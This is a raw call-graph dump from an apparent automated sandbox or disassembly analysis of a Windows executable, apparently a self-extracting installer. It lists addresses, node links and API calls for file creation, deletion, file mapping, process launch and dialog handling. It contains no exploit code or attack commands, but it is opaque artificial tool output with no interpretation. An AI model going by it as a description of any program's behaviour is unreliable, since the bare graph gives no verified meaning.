23961 102ac31 EnterCriticalSection 23950->23961 23952 102a6b3 23962 102c528 23952->23962 23954 102a6c2 23960 102a6d1 23954->23960 23975 102a529 29 API calls 23954->23975 23957 102a6cc 23976 102a5df GetStdHandle GetFileType 23957->23976 23958 102a6e2 _abort 23958->23944 23977 102a6ed LeaveCriticalSection _abort 23960->23977 23961->23952 23963 102c534 ___scrt_is_nonwritable_in_current_image 23962->23963 23964 102c541 23963->23964 23965 102c558 23963->23965 23986 10291a8 20 API calls __dosmaperr 23964->23986 23978 102ac31 EnterCriticalSection 23965->23978 23968 102c546 23987 1029087 26 API calls ___std_exception_copy 23968->23987 23970 102c550 _abort 23970->23954 23973 102c564 23974 102c590 23973->23974 23979 102c479 23973->23979 23988 102c5b7 LeaveCriticalSection _abort 23974->23988 23975->23957 23976->23960 23977->23958 23978->23973 23980 102b136 _abort 20 API calls 23979->23980 23982 102c48b 23980->23982 23981 102c498 23983 1028dcc _free 20 API calls 23981->23983 23982->23981 23989 102af0a 23982->23989 23985 102c4ea 23983->23985 23985->23973 23986->23968 23987->23970 23988->23970 23990 102ac98 _abort 5 API calls 23989->23990 23991 102af31 23990->23991 23992 102af4f InitializeCriticalSectionAndSpinCount 23991->23992 23994 102af3a 23991->23994 23992->23994 23993 101fbbc _ValidateLocalCookies 5 API calls 23995 102af66 23993->23995 23994->23993 23995->23982 24095 101ec50 23996->24095 23999 10108e7 24001 1010c14 GetModuleFileNameW 23999->24001 24106 10275fb 42 API calls __vsnwprintf_l 23999->24106 24000 1010888 GetProcAddress 24002 10108a1 24000->24002 24003 10108b9 GetProcAddress 24000->24003 24012 1010c32 24001->24012 24002->24003 24004 10108cb 24003->24004 24004->23999 24006 1010b54 24006->24001 24007 1010b5f GetModuleFileNameW CreateFileW 24006->24007 24008 1010c08 CloseHandle 24007->24008 24009 1010b8f SetFilePointer 24007->24009 24008->24001 24009->24008 24010 1010b9d ReadFile 24009->24010 24010->24008 24014 1010bbb 24010->24014 24015 1010c94 GetFileAttributesW 24012->24015 24017 1010c5d CompareStringW 24012->24017 24018 1010cac 24012->24018 24097 100b146 24012->24097 24100 101081b 24012->24100 24014->24008 24016 101081b 2 API calls 24014->24016 24015->24012 24015->24018 24016->24014 24017->24012 24019 1010cb7 24018->24019 24021 1010cec 24018->24021 24022 1010cd0 GetFileAttributesW 24019->24022 24024 1010ce8 24019->24024 24020 1010dfb 24044 101a64d GetCurrentDirectoryW 24020->24044 24021->24020 24023 100b146 GetVersionExW 24021->24023 24022->24019 24022->24024 24025 1010d06 24023->24025 24024->24021 24026 1010d73 24025->24026 24027 1010d0d 24025->24027 24028 1004092 _swprintf 51 API calls 24026->24028 24029 101081b 2 API calls 24027->24029 24030 1010d9b AllocConsole 24028->24030 24031 1010d17 24029->24031 24032 1010df3 ExitProcess 24030->24032 24033 1010da8 GetCurrentProcessId AttachConsole 24030->24033 24034 101081b 2 API calls 24031->24034 24111 1023e13 24033->24111 24036 1010d21 24034->24036 24107 100e617 24036->24107 24037 1010dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 24037->24032 24040 1004092 _swprintf 51 API calls 24041 1010d4f 24040->24041 24042 100e617 53 API calls 24041->24042 24043 1010d5e 24042->24043 24043->24032 24044->23837 24046 101081b 2 API calls 24045->24046 24047 101ac2a OleInitialize 24046->24047 24048 101ac4d GdiplusStartup SHGetMalloc 24047->24048 24048->23839 24050 101c5ce 24049->24050 24051 101c6e4 24050->24051 24052 1011fac CharUpperW 24050->24052 24136 100f3fa 82 API calls 2 library calls 24050->24136 24051->23848 24051->23849 24052->24050 24055 101ec50 24054->24055 24056 101dbeb SetEnvironmentVariableW 24055->24056 24058 101dc0e 24056->24058 24057 101dc36 24057->23841 24058->24057 24059 101dc2a SetEnvironmentVariableW 24058->24059 24059->24057 24137 1004065 24060->24137 24063 101b6dd LoadBitmapW 24064 101b70b GetObjectW 24063->24064 24065 101b6fe 24063->24065 24069 101b71a 24064->24069 24171 101a6c2 FindResourceW 24065->24171 24166 101a5c6 24069->24166 24071 101b770 24082 100da42 24071->24082 24072 101b74c 24187 101a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24072->24187 24073 101a6c2 13 API calls 24075 101b73d 24073->24075 24075->24072 24077 101b743 DeleteObject 24075->24077 24076 101b754 24188 101a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24076->24188 24077->24072 24079 101b75d 24189 101a80c 8 API calls 24079->24189 24081 101b764 DeleteObject 24081->24071 24200 100da67 24082->24200 24087 10190b7 24333 101eb38 24087->24333 24091 101acab GdiplusShutdown CoUninitialize 24090->24091 24091->23877 24093->23869 24094->23876 24096 101086d GetModuleHandleW 24095->24096 24096->23999 24096->24000 24098 100b196 24097->24098 24099 100b15a GetVersionExW 24097->24099 24098->24012 24099->24098 24101 101ec50 24100->24101 24102 1010828 GetSystemDirectoryW 24101->24102 24103 1010840 24102->24103 24104 101085e 24102->24104 24105 1010851 LoadLibraryW 24103->24105 24104->24012 24105->24104 24106->24006 24108 100e627 24107->24108 24113 100e648 24108->24113 24112 1023e1b 24111->24112 24112->24037 24112->24112 24119 100d9b0 24113->24119 24116 100e645 24116->24040 24117 100e66b LoadStringW 24117->24116 24118 100e682 LoadStringW 24117->24118 24118->24116 24124 100d8ec 24119->24124 24121 100d9cd 24122 100d9e2 24121->24122 24132 100d9f0 26 API calls 24121->24132 24122->24116 24122->24117 24125 100d904 24124->24125 24131 100d984 _strncpy 24124->24131 24126 100d928 24125->24126 24133 1011da7 WideCharToMultiByte 24125->24133 24128 100d959 24126->24128 24134 100e5b1 50 API calls __vsnprintf 24126->24134 24135 1026159 26 API calls 3 library calls 24128->24135 24131->24121 24132->24122 24133->24126 24134->24128 24135->24131 24136->24050 24138 100407c __vswprintf_c_l 24137->24138 24141 1025fd4 24138->24141 24144 1024097 24141->24144 24145 10240d7 24144->24145 24146 10240bf 24144->24146 24145->24146 24148 10240df 24145->24148 24161 10291a8 20 API calls __dosmaperr 24146->24161 24150 1024636 __fassign 38 API calls 24148->24150 24149 10240c4 24162 1029087 26 API calls ___std_exception_copy 24149->24162 24152 10240ef 24150->24152 24163 1024601 20 API calls 2 library calls 24152->24163 24153 10240cf 24154 101fbbc _ValidateLocalCookies 5 API calls 24153->24154 24156 1004086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24154->24156 24156->24063 24157 1024167 24164 10249e6 51 API calls 4 library calls 24157->24164 24160 1024172 24165 10246b9 20 API calls _free 24160->24165 24161->24149 24162->24153 24163->24157 24164->24160 24165->24153 24190 101a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24166->24190 24168 101a5cd 24169 101a5d9 24168->24169 24191 101a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24168->24191 24169->24071 24169->24072 24169->24073 24172 101a6e5 SizeofResource 24171->24172 24173 101a7d3 24171->24173 24172->24173 24174 101a6fc LoadResource 24172->24174 24173->24064 24173->24069 24174->24173 24175 101a711 LockResource 24174->24175 24175->24173 24176 101a722 GlobalAlloc 24175->24176 24176->24173 24177 101a73d GlobalLock 24176->24177 24178 101a7cc GlobalFree 24177->24178 24179 101a74c __InternalCxxFrameHandler 24177->24179 24178->24173 24180 101a754 CreateStreamOnHGlobal 24179->24180 24181 101a7c5 GlobalUnlock 24180->24181 24182 101a76c 24180->24182 24181->24178 24192 101a626 GdipAlloc 24182->24192 24185 101a79a GdipCreateHBITMAPFromBitmap 24186 101a7b0 24185->24186 24186->24181 24187->24076 24188->24079 24189->24081 24190->24168 24191->24169 24193 101a645 24192->24193 24194 101a638 24192->24194 24193->24181 24193->24185 24193->24186 24196 101a3b9 24194->24196 24197 101a3e1 GdipCreateBitmapFromStream 24196->24197 24198 101a3da GdipCreateBitmapFromStreamICM 24196->24198 24199 101a3e6 24197->24199 24198->24199 24199->24193 24201 100da75 __EH_prolog 24200->24201 24202 100daa4 GetModuleFileNameW 24201->24202 24203 100dad5 24201->24203 24204 100dabe 24202->24204 24246 10098e0 24203->24246 24204->24203 24206 100db31 24257 1026310 24206->24257 24210 100e261 78 API calls 24212 100db05 24210->24212 24211 100db44 24213 1026310 26 API calls 24211->24213 24212->24206 24212->24210 24224 100dd4a 24212->24224 24221 100db56 ___vcrt_InitializeCriticalSectionEx 24213->24221 24214 100dc85 24214->24224 24293 1009d70 81 API calls 24214->24293 24218 100dc9f ___std_exception_copy 24219 1009bd0 82 API calls 24218->24219 24218->24224 24222 100dcc8 ___std_exception_copy 24219->24222 24221->24214 24221->24224 24271 1009e80 24221->24271 24287 1009bd0 24221->24287 24292 1009d70 81 API calls 24221->24292 24222->24224 24241 100dcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 24222->24241 24294 1011b84 MultiByteToWideChar 24222->24294 24280 100959a 24224->24280 24225 100e159 24230 100e1de 24225->24230 24300 1028cce 26 API calls ___std_exception_copy 24225->24300 24227 100e16e 24301 1027625 26 API calls ___std_exception_copy 24227->24301 24229 100e214 24233 1026310 26 API calls 24229->24233 24230->24229 24236 100e261 78 API calls 24230->24236 24232 100e1c6 24302 100e27c 78 API calls 24232->24302 24235 100e22d 24233->24235 24237 1026310 26 API calls 24235->24237 24236->24230 24237->24224 24239 1011da7 WideCharToMultiByte 24239->24241 24241->24224 24241->24225 24241->24239 24295 100e5b1 50 API calls __vsnprintf 24241->24295 24296 1026159 26 API calls 3 library calls 24241->24296 24297 1028cce 26 API calls ___std_exception_copy 24241->24297 24298 1027625 26 API calls ___std_exception_copy 24241->24298 24299 100e27c 78 API calls 24241->24299 24244 100e29e GetModuleHandleW FindResourceW 24245 100da55 24244->24245 24245->24087 24247 10098ea 24246->24247 24248 100994b CreateFileW 24247->24248 24249 100996c GetLastError 24248->24249 24253 10099bb 24248->24253 24303 100bb03 24249->24303 24251 100998c 24252 1009990 CreateFileW GetLastError 24251->24252 24251->24253 24252->24253 24254 10099b5 24252->24254 24255 10099e5 SetFileTime 24253->24255 24256 10099ff 24253->24256 24254->24253 24255->24256 24256->24212 24258 1026349 24257->24258 24259 102634d 24258->24259 24270 1026375 24258->24270 24307 10291a8 20 API calls __dosmaperr 24259->24307 24261 1026352 24308 1029087 26 API calls ___std_exception_copy 24261->24308 24262 1026699 24264 101fbbc _ValidateLocalCookies 5 API calls 24262->24264 24266 10266a6 24264->24266 24265 102635d 24267 101fbbc _ValidateLocalCookies 5 API calls 24265->24267 24266->24211 24269 1026369 24267->24269 24269->24211 24270->24262 24309 1026230 5 API calls _ValidateLocalCookies 24270->24309 24272 1009e92 24271->24272 24273 1009ea5 24271->24273 24274 1009eb0 24272->24274 24310 1006d5b 77 API calls 24272->24310 24273->24274 24276 1009eb8 SetFilePointer 24273->24276 24274->24221 24276->24274 24277 1009ed4 GetLastError 24276->24277 24277->24274 24278 1009ede 24277->24278 24278->24274 24311 1006d5b 77 API calls 24278->24311 24281 10095cf 24280->24281 24282 10095be 24280->24282 24281->24244 24282->24281 24283 10095d1 24282->24283 24284 10095ca 24282->24284 24317 1009620 24283->24317 24312 100974e 24284->24312 24288 1009be3 24287->24288 24289 1009bdc 24287->24289 24288->24289 24291 1009785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24288->24291 24332 1006d1a 77 API calls 24288->24332 24289->24221 24291->24288 24292->24221 24293->24218 24294->24241 24295->24241 24296->24241 24297->24241 24298->24241 24299->24241 24300->24227 24301->24232 24302->24230 24304 100bb10 _wcslen 24303->24304 24305 100bbb8 GetCurrentDirectoryW 24304->24305 24306 100bb39 _wcslen 24304->24306 24305->24306 24306->24251 24307->24261 24308->24265 24309->24270 24310->24273 24311->24274 24313 1009781 24312->24313 24314 1009757 24312->24314 24313->24281 24314->24313 24323 100a1e0 24314->24323 24318 100962c 24317->24318 24319 100964a 24317->24319 24318->24319 24321 1009638 CloseHandle 24318->24321 24320 1009669 24319->24320 24331 1006bd5 76 API calls 24319->24331 24320->24281 24321->24319 24324 101ec50 24323->24324 24325 100a1ed DeleteFileW 24324->24325 24326 100a200 24325->24326 24327 100977f 24325->24327 24328 100bb03 GetCurrentDirectoryW 24326->24328 24327->24281 24329 100a214 24328->24329 24329->24327 24330 100a218 DeleteFileW 24329->24330 24330->24327 24331->24320 24332->24288 24335 101eb3d ___std_exception_copy 24333->24335 24334 10190d6 24334->23862 24335->24334 24337 101eb59 24335->24337 24342 1027a5e 7 API calls 2 library calls 24335->24342 24341 101f5c9 24337->24341 24343 102238d RaiseException 24337->24343 24339 101f5e6 24344 102238d RaiseException 24341->24344 24342->24335 24343->24341 24344->24339 24346 1027ce1 _abort 24345->24346 24347 1027cfa 24346->24347 24348 1027ce8 24346->24348 24369 102ac31 EnterCriticalSection 24347->24369 24381 1027e2f GetModuleHandleW 24348->24381 24351 1027ced 24351->24347 24382 1027e73 GetModuleHandleExW 24351->24382 24352 1027d9f 24370 1027ddf 24352->24370 24356 1027d76 24360 1027d8e 24356->24360 24365 1028a91 _abort 5 API calls 24356->24365 24358 1027de8 24391 1032390 5 API calls _ValidateLocalCookies 24358->24391 24359 1027dbc 24373 1027dee 24359->24373 24366 1028a91 _abort 5 API calls 24360->24366 24361 1027d01 24361->24352 24361->24356 24390 10287e0 20 API calls _abort 24361->24390 24365->24360 24366->24352 24369->24361 24392 102ac81 LeaveCriticalSection 24370->24392 24372 1027db8 24372->24358 24372->24359 24393 102b076 24373->24393 24376 1027e1c 24379 1027e73 _abort 8 API calls 24376->24379 24377 1027dfc GetPEB 24377->24376 24378 1027e0c GetCurrentProcess TerminateProcess 24377->24378 24378->24376 24380 1027e24 ExitProcess 24379->24380 24381->24351 24383 1027ec0 24382->24383 24384 1027e9d GetProcAddress 24382->24384 24386 1027ec6 FreeLibrary 24383->24386 24387 1027ecf 24383->24387 24385 1027eb2 24384->24385 24385->24383 24386->24387 24388 101fbbc _ValidateLocalCookies 5 API calls 24387->24388 24389 1027cf9 24388->24389 24389->24347 24390->24356 24392->24372 24394 102b09b 24393->24394 24398 102b091 24393->24398 24395 102ac98 _abort 5 API calls 24394->24395 24395->24398 24396 101fbbc _ValidateLocalCookies 5 API calls 24397 1027df8 24396->24397 24397->24376 24397->24377 24398->24396 25467 102b1b8 27 API calls 2 library calls 25468 1011bbd GetCPInfo IsDBCSLeadByte 25469 101b5c0 100 API calls 25470 10177c0 118 API calls 25471 101ffc0 RaiseException _com_error::_com_error CallUnexpected 24405 101dec2 24406 101decf 24405->24406 24407 100e617 53 API calls 24406->24407 24408 101dedc 24407->24408 24409 1004092 _swprintf 51 API calls 24408->24409 24410 101def1 SetDlgItemTextW 24409->24410 24413 101b568 PeekMessageW 24410->24413 24414 101b583 GetMessageW 24413->24414 24415 101b5bc 24413->24415 24416 101b599 IsDialogMessageW 24414->24416 24417 101b5a8 TranslateMessage DispatchMessageW 24414->24417 24416->24415 24416->24417 24417->24415 25519 10162ca 123 API calls __InternalCxxFrameHandler 24425 101e1d1 14 API calls ___delayLoadHelper2@8 25473 102a3d0 21 API calls 2 library calls 25521 101f4d3 20 API calls 25474 1032bd0 VariantClear 24429 10010d5 24434 1005abd 24429->24434 24435 1005ac7 __EH_prolog 24434->24435 24441 100b505 24435->24441 24437 1005ad3 24447 1005cac GetCurrentProcess GetProcessAffinityMask 24437->24447 24442 100b50f __EH_prolog 24441->24442 24448 100f1d0 82 API calls 24442->24448 24444 100b521 24449 100b61e 24444->24449 24448->24444 24450 100b630 _abort 24449->24450 24453 10110dc 24450->24453 24456 101109e GetCurrentProcess GetProcessAffinityMask 24453->24456 24457 100b597 24456->24457 24457->24437 24458 101e2d7 24459 101e1db 24458->24459 24460 101e85d ___delayLoadHelper2@8 14 API calls 24459->24460 24460->24459 25523 1020ada 51 API calls 2 library calls 24554 101b7e0 24555 101b7ea __EH_prolog 24554->24555 24722 1001316 24555->24722 24558 101b82a 24560 101b841 24558->24560 24563 101b838 24558->24563 24564 101b89b 24558->24564 24559 101bf0f 24787 101d69e 24559->24787 24568 101b878 24563->24568 24569 101b83c 24563->24569 24567 101b92e GetDlgItemTextW 24564->24567 24573 101b8b1 24564->24573 24565 101bf38 24570 101bf41 SendDlgItemMessageW 24565->24570 24571 101bf52 GetDlgItem SendMessageW 24565->24571 24566 101bf2a SendMessageW 24566->24565 24567->24568 24572 101b96b 24567->24572 24568->24560 24576 101b95f KiUserCallbackDispatcher 24568->24576 24569->24560 24574 100e617 53 API calls 24569->24574 24570->24571 24805 101a64d GetCurrentDirectoryW 24571->24805 24577 101b980 GetDlgItem 24572->24577 24720 101b974 24572->24720 24578 100e617 53 API calls 24573->24578 24579 101b85b 24574->24579 24576->24560 24581 101b994 SendMessageW SendMessageW 24577->24581 24582 101b9b7 SetFocus 24577->24582 24583 101b8ce SetDlgItemTextW 24578->24583 24825 100124f SHGetMalloc 24579->24825 24580 101bf82 GetDlgItem 24585 101bfa5 SetWindowTextW 24580->24585 24586 101bf9f 24580->24586 24581->24582 24587 101b9c7 24582->24587 24600 101b9e0 24582->24600 24588 101b8d9 24583->24588 24806 101abab GetClassNameW 24585->24806 24586->24585 24589 100e617 53 API calls 24587->24589 24588->24560 24593 101b8e6 GetMessageW 24588->24593 24594 101b9d1 24589->24594 24590 101b862 24590->24560 24599 101c1fc SetDlgItemTextW 24590->24599 24591 101be55 24595 100e617 53 API calls 24591->24595 24593->24560 24597 101b8fd IsDialogMessageW 24593->24597 24826 101d4d4 24594->24826 24601 101be65 SetDlgItemTextW 24595->24601 24597->24588 24603 101b90c TranslateMessage DispatchMessageW 24597->24603 24599->24560 24606 100e617 53 API calls 24600->24606 24604 101be79 24601->24604 24603->24588 24608 100e617 53 API calls 24604->24608 24607 101ba17 24606->24607 24614 1004092 _swprintf 51 API calls 24607->24614 24641 101be9c _wcslen 24608->24641 24609 101bff0 24613 101c020 24609->24613 24616 100e617 53 API calls 24609->24616 24610 101b9d9 24732 100a0b1 24610->24732 24611 101c73f 97 API calls 24611->24609 24617 101c0d8 24613->24617 24622 101c73f 97 API calls 24613->24622 24618 101ba29 24614->24618 24621 101c003 SetDlgItemTextW 24616->24621 24623 101c18b 24617->24623 24656 101c169 24617->24656 24669 100e617 53 API calls 24617->24669 24624 101d4d4 16 API calls 24618->24624 24619 101ba68 GetLastError 24620 101ba73 24619->24620 24738 101ac04 SetCurrentDirectoryW 24620->24738 24627 100e617 53 API calls 24621->24627 24629 101c03b 24622->24629 24625 101c194 EnableWindow 24623->24625 24626 101c19d 24623->24626 24624->24610 24625->24626 24630 101c1ba 24626->24630 24844 10012d3 GetDlgItem EnableWindow 24626->24844 24631 101c017 SetDlgItemTextW 24627->24631 24639 101c04d 24629->24639 24652 101c072 24629->24652 24636 101c1e1 24630->24636 24645 101c1d9 SendMessageW 24630->24645 24631->24613 24632 101ba87 24637 101ba9e 24632->24637 24638 101ba90 GetLastError 24632->24638 24633 100e617 53 API calls 24633->24560 24634 101c0cb 24642 101c73f 97 API calls 24634->24642 24636->24560 24646 100e617 53 API calls 24636->24646 24647 101baae GetTickCount 24637->24647 24649 101bb20 24637->24649 24698 101bb11 24637->24698 24638->24637 24842 1019ed5 32 API calls 24639->24842 24640 101c1b0 24845 10012d3 GetDlgItem EnableWindow 24640->24845 24648 100e617 53 API calls 24641->24648 24670 101beed 24641->24670 24642->24617 24645->24636 24646->24590 24654 1004092 _swprintf 51 API calls 24647->24654 24655 101bed0 24648->24655 24657 101bcfb 24649->24657 24658 101bcf1 24649->24658 24659 101bb39 GetModuleFileNameW 24649->24659 24650 101bd56 24747 10012f1 GetDlgItem ShowWindow 24650->24747 24651 101c066 24651->24652 24652->24634 24667 101c73f 97 API calls 24652->24667 24662 101bac7 24654->24662 24663 1004092 _swprintf 51 API calls 24655->24663 24843 1019ed5 32 API calls 24656->24843 24660 100e617 53 API calls 24657->24660 24658->24568 24658->24657 24836 100f28c 82 API calls 24659->24836 24666 101bd05 24660->24666 24661 101bd66 24748 10012f1 GetDlgItem ShowWindow 24661->24748 24739 100966e 24662->24739 24663->24670 24674 1004092 _swprintf 51 API calls 24666->24674 24675 101c0a0 24667->24675 24669->24617 24670->24633 24671 101c188 24671->24623 24672 101bb5f 24673 1004092 _swprintf 51 API calls 24672->24673 24677 101bb81 CreateFileMappingW 24673->24677 24678 101bd23 24674->24678 24675->24634 24679 101c0a9 DialogBoxParamW 24675->24679 24676 101bd70 24680 100e617 53 API calls 24676->24680 24682 101bbe3 GetCommandLineW 24677->24682 24714 101bc60 __InternalCxxFrameHandler 24677->24714 24691 100e617 53 API calls 24678->24691 24679->24568 24679->24634 24683 101bd7a SetDlgItemTextW 24680->24683 24685 101bbf4 24682->24685 24749 10012f1 GetDlgItem ShowWindow 24683->24749 24684 101baed 24688 101baff 24684->24688 24689 101baf4 GetLastError 24684->24689 24837 101b425 SHGetMalloc 24685->24837 24686 101bc6b ShellExecuteExW 24712 101bc88 24686->24712 24693 100959a 80 API calls 24688->24693 24689->24688 24695 101bd3d 24691->24695 24692 101bd8c SetDlgItemTextW GetDlgItem 24696 101bdc1 24692->24696 24697 101bda9 GetWindowLongW SetWindowLongW 24692->24697 24693->24698 24694 101bc10 24838 101b425 SHGetMalloc 24694->24838 24750 101c73f 24696->24750 24697->24696 24698->24649 24698->24650 24701 101bc1c 24839 101b425 SHGetMalloc 24701->24839 24704 101bccb 24704->24658 24710 101bce1 UnmapViewOfFile CloseHandle 24704->24710 24705 101c73f 97 API calls 24707 101bddd 24705->24707 24706 101bc28 24840 100f3fa 82 API calls 2 library calls 24706->24840 24775 101da52 24707->24775 24710->24658 24711 101bc3f MapViewOfFile 24711->24714 24712->24704 24715 101bcb7 Sleep 24712->24715 24714->24686 24715->24704 24715->24712 24716 101c73f 97 API calls 24719 101be03 24716->24719 24717 101be2c 24841 10012d3 GetDlgItem EnableWindow 24717->24841 24719->24717 24721 101c73f 97 API calls 24719->24721 24720->24568 24720->24591 24721->24717 24723 1001378 24722->24723 24724 100131f 24722->24724 24847 100e2c1 GetWindowLongW SetWindowLongW 24723->24847 24725 1001385 24724->24725 24846 100e2e8 62 API calls 2 library calls 24724->24846 24725->24558 24725->24559 24725->24560 24728 1001341 24728->24725 24729 1001354 GetDlgItem 24728->24729 24729->24725 24730 1001364 24729->24730 24730->24725 24731 100136a SetWindowTextW 24730->24731 24731->24725 24735 100a0bb 24732->24735 24733 100a14c 24734 100a2b2 8 API calls 24733->24734 24736 100a175 24733->24736 24734->24736 24735->24733 24735->24736 24848 100a2b2 24735->24848 24736->24619 24736->24620 24738->24632 24740 1009678 24739->24740 24741 10096d5 CreateFileW 24740->24741 24742 10096c9 24740->24742 24741->24742 24743 100971f 24742->24743 24744 100bb03 GetCurrentDirectoryW 24742->24744 24743->24684 24745 1009704 24744->24745 24745->24743 24746 1009708 CreateFileW 24745->24746 24746->24743 24747->24661 24748->24676 24749->24692 24751 101c749 __EH_prolog 24750->24751 24752 101bdcf 24751->24752 24753 101b314 ExpandEnvironmentStringsW 24751->24753 24752->24705 24760 101c780 _wcslen _wcsrchr 24753->24760 24755 101b314 ExpandEnvironmentStringsW 24755->24760 24756 101ca67 SetWindowTextW 24756->24760 24759 1023e3e 22 API calls 24759->24760 24760->24752 24760->24755 24760->24756 24760->24759 24762 101c855 SetFileAttributesW 24760->24762 24768 101cc31 GetDlgItem SetWindowTextW SendMessageW 24760->24768 24770 101cc71 SendMessageW 24760->24770 24869 1011fbb CompareStringW 24760->24869 24870 101a64d GetCurrentDirectoryW 24760->24870 24872 100a5d1 6 API calls 24760->24872 24873 100a55a FindClose 24760->24873 24874 101b48e 76 API calls 2 library calls 24760->24874 24763 101c90f GetFileAttributesW 24762->24763 24774 101c86f _abort _wcslen 24762->24774 24763->24760 24766 101c921 DeleteFileW 24763->24766 24766->24760 24767 101c932 24766->24767 24769 1004092 _swprintf 51 API calls 24767->24769 24768->24760 24771 101c952 GetFileAttributesW 24769->24771 24770->24760 24771->24767 24772 101c967 MoveFileW 24771->24772 24772->24760 24773 101c97f MoveFileExW 24772->24773 24773->24760 24774->24760 24774->24763 24871 100b991 51 API calls 2 library calls 24774->24871 24776 101da5c __EH_prolog 24775->24776 24875 1010659 24776->24875 24778 101da8d 24879 1005b3d 24778->24879 24780 101daab 24883 1007b0d 24780->24883 24784 101dafe 24899 1007b9e 24784->24899 24786 101bdee 24786->24716 24788 101d6a8 24787->24788 24789 101a5c6 4 API calls 24788->24789 24790 101d6ad 24789->24790 24791 101d6b5 GetWindow 24790->24791 24792 101bf15 24790->24792 24791->24792 24795 101d6d5 24791->24795 24792->24565 24792->24566 24793 101d6e2 GetClassNameW 25364 1011fbb CompareStringW 24793->25364 24795->24792 24795->24793 24796 101d706 GetWindowLongW 24795->24796 24797 101d76a GetWindow 24795->24797 24796->24797 24798 101d716 SendMessageW 24796->24798 24797->24792 24797->24795 24798->24797 24799 101d72c GetObjectW 24798->24799 25365 101a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24799->25365 24802 101d743 25366 101a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24802->25366 25367 101a80c 8 API calls 24802->25367 24804 101d754 SendMessageW DeleteObject 24804->24797 24805->24580 24807 101abcc 24806->24807 24809 101abf1 24806->24809 25368 1011fbb CompareStringW 24807->25368 24812 101b093 24809->24812 24810 101abdf 24810->24809 24811 101abe3 FindWindowExW 24810->24811 24811->24809 24813 101b09d __EH_prolog 24812->24813 24814 10013dc 84 API calls 24813->24814 24815 101b0bf 24814->24815 25369 1001fdc 24815->25369 24818 101b0d9 24820 1001692 86 API calls 24818->24820 24819 101b0eb 24821 10019af 128 API calls 24819->24821 24822 101b0e4 24820->24822 24824 101b10d __InternalCxxFrameHandler ___std_exception_copy 24821->24824 24822->24609 24822->24611 24823 1001692 86 API calls 24823->24822 24824->24823 24825->24590 24827 101b568 5 API calls 24826->24827 24828 101d4e0 GetDlgItem 24827->24828 24829 101d502 24828->24829 24830 101d536 SendMessageW SendMessageW 24828->24830 24833 101d50d ShowWindow SendMessageW SendMessageW 24829->24833 24831 101d591 SendMessageW SendMessageW SendMessageW 24830->24831 24832 101d572 24830->24832 24834 101d5c4 SendMessageW 24831->24834 24835 101d5e7 SendMessageW 24831->24835 24832->24831 24833->24830 24834->24835 24835->24610 24836->24672 24837->24694 24838->24701 24839->24706 24840->24711 24841->24720 24842->24651 24843->24671 24844->24640 24845->24630 24846->24728 24847->24725 24849 100a2bf 24848->24849 24850 100a2e3 24849->24850 24851 100a2d6 CreateDirectoryW 24849->24851 24852 100a231 3 API calls 24850->24852 24851->24850 24853 100a316 24851->24853 24854 100a2e9 24852->24854 24856 100a325 24853->24856 24861 100a4ed 24853->24861 24855 100a329 GetLastError 24854->24855 24857 100bb03 GetCurrentDirectoryW 24854->24857 24855->24856 24856->24735 24859 100a2ff 24857->24859 24859->24855 24860 100a303 CreateDirectoryW 24859->24860 24860->24853 24860->24855 24862 101ec50 24861->24862 24863 100a4fa SetFileAttributesW 24862->24863 24864 100a510 24863->24864 24865 100a53d 24863->24865 24866 100bb03 GetCurrentDirectoryW 24864->24866 24865->24856 24867 100a524 24866->24867 24867->24865 24868 100a528 SetFileAttributesW 24867->24868 24868->24865 24869->24760 24870->24760 24871->24774 24872->24760 24873->24760 24874->24760 24876 1010666 _wcslen 24875->24876 24903 10017e9 24876->24903 24878 101067e 24878->24778 24880 1010659 _wcslen 24879->24880 24881 10017e9 78 API calls 24880->24881 24882 101067e 24881->24882 24882->24780 24884 1007b17 __EH_prolog 24883->24884 24920 100ce40 24884->24920 24886 1007b32 24887 101eb38 8 API calls 24886->24887 24888 1007b5c 24887->24888 24926 1014a76 24888->24926 24891 1007c7d 24892 1007c87 24891->24892 24894 1007cf1 24892->24894 24955 100a56d 24892->24955 24896 1007d50 24894->24896 24933 1008284 24894->24933 24895 1007d92 24895->24784 24896->24895 24961 100138b 74 API calls 24896->24961 24900 1007bac 24899->24900 24902 1007bb3 24899->24902 24901 1012297 86 API calls 24900->24901 24901->24902 24905 10017ff 24903->24905 24915 100185a __InternalCxxFrameHandler 24903->24915 24904 1001828 24906 1001887 24904->24906 24912 1001847 ___std_exception_copy 24904->24912 24905->24904 24916 1006c36 76 API calls __vswprintf_c_l 24905->24916 24908 1023e3e 22 API calls 24906->24908 24910 100188e 24908->24910 24909 100181e 24917 1006ca7 75 API calls 24909->24917 24910->24915 24919 1006ca7 75 API calls 24910->24919 24912->24915 24918 1006ca7 75 API calls 24912->24918 24915->24878 24916->24909 24917->24904 24918->24915 24919->24915 24921 100ce4a __EH_prolog 24920->24921 24922 101eb38 8 API calls 24921->24922 24923 100ce8d 24922->24923 24924 101eb38 8 API calls 24923->24924 24925 100ceb1 24924->24925 24925->24886 24927 1014a80 __EH_prolog 24926->24927 24928 101eb38 8 API calls 24927->24928 24930 1014a9c 24928->24930 24929 1007b8b 24929->24891 24930->24929 24932 1010e46 80 API calls 24930->24932 24932->24929 24934 100828e __EH_prolog 24933->24934 24962 10013dc 24934->24962 24936 10082aa 24937 10082bb 24936->24937 25105 1009f42 24936->25105 24940 10082f2 24937->24940 24970 1001a04 24937->24970 25101 1001692 24940->25101 24943 1008389 24989 1008430 24943->24989 24946 10083e8 24997 1001f6d 24946->24997 24949 10082ee 24949->24940 24949->24943 24953 100a56d 7 API calls 24949->24953 25109 100c0c5 CompareStringW _wcslen 24949->25109 24951 10083f3 24951->24940 25001 1003b2d 24951->25001 25013 100848e 24951->25013 24953->24949 24956 100a582 24955->24956 24960 100a5b0 24956->24960 25353 100a69b 24956->25353 24958 100a592 24959 100a597 FindClose 24958->24959 24958->24960 24959->24960 24960->24892 24961->24895 24963 10013e1 __EH_prolog 24962->24963 24964 100ce40 8 API calls 24963->24964 24965 1001419 24964->24965 24966 101eb38 8 API calls 24965->24966 24969 1001474 _abort 